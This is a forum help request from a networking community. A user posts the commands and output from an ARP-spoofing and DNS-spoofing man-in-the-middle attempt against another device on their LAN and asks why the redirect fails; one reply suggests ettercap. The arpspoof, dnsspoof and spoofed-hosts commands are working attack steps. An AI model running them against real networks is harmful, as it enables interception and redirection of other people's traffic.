DNS Spoofing and MITM | Help

0 Colin Hemmi · October 6, 2015
Hello I already wrote something to this theme in another topic but I still have a few questions.


echo 1 > /proc/sys/net/ipv4/ip_forward
root@kakteen:~# apache2ctl start
root@kakteen:~# nmap 192.168.178.1-255

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-05 08:41 BST
Nmap scan report for fritz.box (192.168.178.1)
Host is up (0.0057s latency).
MAC Address: 24:65:11:7A:F9:F9 (AVM GmbH)
Nmap scan report for 192.168.178.31
Host is up (0.59s latency).
MAC Address: 38:94:96:D7:CF:31 (Samsung Elec Co.)
Nmap scan report for kakteen.fritz.box (192.168.178.76)
Host is up.
Nmap done: 255 IP addresses (7 hosts up) scanned in 9.14 seconds

After that.
arpspoof -t 192.168.178.31 192.168.178.1 && arpspoof -t 192.168.178.1 192.168.178.31 
0:22:fa:2b:f1:34 0:0:0:0:0:0 0806 42: arp reply 192.168.178.1 is-at 0:22:fa:2b:f1:34
0:22:fa:2b:f1:34 0:0:0:0:0:0 0806 42: arp reply 192.168.178.1 is-at 0:22:fa:2b:f1:34



dnsspoof -f Desktop/spoofhosts.txt host 192.168.178.31 and udp port 53
dnsspoof: listening on wlan0 [host 192.168.178.31 and udp port 53]



What in my spoofhosts.txt data is:
192.168.178.76 www*
192.168.178.76 bacon.com
What am I doing wrong?

Post a Reply

Replies

Oldest  Newest  Rating
0 Miss Protocol · October 10, 2015
dude use ettercap
  • 1

Networking

106,993 followers
About

Chat about routers, switches and firewalls, and more!

Links
Moderators
Bucky Roberts Administrator